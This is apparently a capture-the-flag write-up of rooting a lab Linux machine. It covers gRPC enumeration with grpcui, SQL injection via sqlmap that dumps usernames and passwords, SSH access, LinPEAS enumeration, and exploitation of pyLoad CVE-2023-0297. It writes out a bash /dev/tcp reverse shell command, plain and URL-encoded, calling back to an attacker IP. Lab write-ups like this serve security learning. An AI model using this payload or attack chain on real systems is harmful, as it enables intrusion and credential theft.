PC is a Linux machine with an open port running gRPC (Google Remote Procedure Call). Interaction with the server using grpcui allows for the creation of a new user on the system. Interception of a POST request to the /invoke/SimpleApp.getInfo endpoint can be used to run SQLMap, resulting in a database dump of username and passwords which can be leveraged to SSH into the system. Further scanning using LinPEAS reveals the presence of several active ports. Viewing a page on port 8000 uncovers that the server is running pyLoad, a download manager software. The current version of pyLoad running on the machine is vulnerable to arbitrary code injection (CVE-2023-0297) which can be used to get a root shell.
nmap scan:
Open ports:
- 22 (SSH)
- 50051 (unknown)
I tried connecting to port 50051 with netcat which then showed these non-printable characters: ▒?��?�� ?
Eventually the connection timed out with an error message:
I did a google search for "http2 port 50051" which brought up some results related to gRPC. Then, I found that the default port for gRPC is 50051. So, I looked for a tool that could be used to interact with gRPC which led to grpcui, an interactive web UI for the gRPC protocol:
Three methods can be used on this service:
- LoginUser
- RegisterUser
- getInfo
I registered a new user and logged in which provided me with an id and token. I sent a request to getInfo using the given id and token which responded with the message "Will update soon."
Then, I intercepted this request with burp suite to get a better idea of the structure:
Assuming that the server was using some type of SQL database, I ran sqlmap on the above request to check for SQLi. The output showed that the server was using SQLite and resulted in a database dump of usernames and passwords:
I was able to SSH into the system as user sau. This is where the user flag can be found:
Next, I started up a local python server so I could download LinPEAS on the target system:
Downloaded LinPEAS with wget:
After enumerating with LinPEAS, the most interesting results were the active ports:
I forwarded port 1234 on my machine to port 8000 on the target machine to see what was running:
This brought up a page running pyLoad:
I searched for "pyload vulnerability" on google which led me to the CVE-2023-0297 mentioned on snyk Vulnerability DB (Arbitrary Code Injection) and features the this POC.
(click image to enlarge)
The current version running on the machine is before the patch:
So, I started a listener with netcat:
Then, I edited the exploit code featured in the POC to contain a URL encoded reverse shell command within the system() function.
Reverse shell command:
\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.30/9001 0>&1'\"URL encoded:
\"%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.30%2F9001%200%3E%261%27\"Sent the payload:
Obtained a root shell:
